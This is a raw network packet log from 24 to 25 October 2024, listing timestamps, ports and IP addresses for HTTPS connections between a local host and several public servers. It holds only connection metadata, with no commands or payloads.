                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.745498896 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.745887041 CEST44349779104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.745956898 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.788197994 CEST44349779104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.788435936 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.812371969 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.847265005 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.847388029 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.847405910 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.847462893 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.848083019 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.848089933 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.848155975 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.848270893 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.848314047 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.848750114 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.848758936 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.848834991 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.863468885 CEST44349779104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.863562107 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.863579035 CEST44349779104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.863607883 CEST44349779104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.863639116 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.863668919 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.864634991 CEST44349779104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.864717960 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.864727020 CEST44349779104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.864788055 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.864799023 CEST44349779104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.864801884 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.864840031 CEST44349779104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.864862919 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.864892960 CEST49779443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.964435101 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.964442015 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.964689016 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.964705944 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.964719057 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.964742899 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.964772940 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.965338945 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.965410948 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.965732098 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:44.965800047 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.047631979 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.047821999 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.082108021 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.082237005 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.082407951 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.082480907 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.082848072 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.082905054 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.083693027 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.083751917 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.210992098 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.211177111 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.216160059 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.216243982 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.224313021 CEST44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.224636078 CEST49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.224647999 CEST44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.225106955 CEST44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.225472927 CEST49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.225552082 CEST44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.226759911 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.226820946 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.226846933 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.226861000 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.226878881 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.226902962 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.266103983 CEST49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.328535080 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.328623056 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.328747988 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.328747988 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.328777075 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.328834057 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.328919888 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.328978062 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.329674959 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.329730988 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.329747915 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.329752922 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.329782009 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.378119946 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.446208000 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.446273088 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.446346045 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.446369886 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.446386099 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.446387053 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.446428061 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.446630955 CEST49780443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.446644068 CEST44349780104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.449687004 CEST49782443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.449708939 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.449801922 CEST49782443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.450119972 CEST49782443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:45.450133085 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.059144020 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.060503006 CEST49782443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.060532093 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.061106920 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.062172890 CEST49782443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.062263966 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.063812017 CEST49782443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.107352972 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.212826014 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.212922096 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.213063955 CEST49782443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.213412046 CEST49782443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.213434935 CEST44349782104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.244471073 CEST49783443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.244561911 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.244678974 CEST49783443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.244904041 CEST49783443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.244940996 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.843262911 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.843703985 CEST49783443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.843735933 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.844444990 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.844957113 CEST49783443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.845046043 CEST49783443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.845074892 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.845103979 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.887207031 CEST49783443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.980701923 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.980798960 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.980915070 CEST49783443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.981888056 CEST49783443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.981931925 CEST44349783104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.984808922 CEST49784443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.984857082 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.984961033 CEST49784443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.985183001 CEST49784443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.985202074 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.992229939 CEST49785443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.992316008 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.992554903 CEST49785443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.992654085 CEST49785443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:46.992686987 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.600347042 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.600688934 CEST49785443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.600723028 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.601078987 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.601461887 CEST49785443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.601528883 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.601612091 CEST49785443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.602631092 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.602845907 CEST49784443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.602905989 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.603390932 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.603707075 CEST49784443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.603797913 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.603818893 CEST49784443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.643357038 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.649658918 CEST49784443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.649677038 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.740586996 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.740648985 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.740709066 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.740711927 CEST49785443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.740777969 CEST49785443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.741365910 CEST49785443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.741408110 CEST44349785104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.758196115 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.758378983 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.758620977 CEST49784443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.758958101 CEST49784443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.758999109 CEST44349784104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.951600075 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.951693058 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.951802015 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.952096939 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:47.952152967 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.176142931 CEST49750443192.168.2.1635.190.19.88
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.176162004 CEST4434975035.190.19.88192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.464031935 CEST49755443192.168.2.1618.203.166.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.464059114 CEST4434975518.203.166.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.555056095 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.555413961 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.555424929 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.557004929 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.557460070 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.557614088 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.557620049 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.557641983 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.557720900 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.557775974 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.557863951 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.557923079 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882339954 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882405996 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882442951 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882457018 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882468939 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882502079 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882508993 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882514000 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882555008 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882555962 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882569075 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882599115 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.882987022 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.926196098 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.926211119 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.974261045 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.997735977 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.997807026 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.997862101 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.997885942 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.998064995 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.998107910 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.998116970 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.998159885 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.998205900 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.998212099 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999034882 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999077082 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999084949 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999093056 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999131918 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999136925 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999196053 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999234915 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999325037 CEST49786443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:48.999344110 CEST44349786104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.001744032 CEST49787443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.001840115 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.001946926 CEST49787443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.002159119 CEST49787443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.002190113 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.620982885 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.621293068 CEST49787443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.621323109 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.621994972 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.622301102 CEST49787443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.622387886 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.622428894 CEST49787443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.667327881 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.674118042 CEST49787443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.766792059 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.766990900 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.767085075 CEST49787443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.767539978 CEST49787443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:49.767565966 CEST44349787104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:50.074939013 CEST44349771104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:50.075018883 CEST44349771104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:50.075094938 CEST49771443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:50.078618050 CEST44349773104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:50.078797102 CEST44349773104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:50.078872919 CEST49773443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:50.745690107 CEST44349774188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:50.745795012 CEST44349774188.114.96.3192.168.2.16
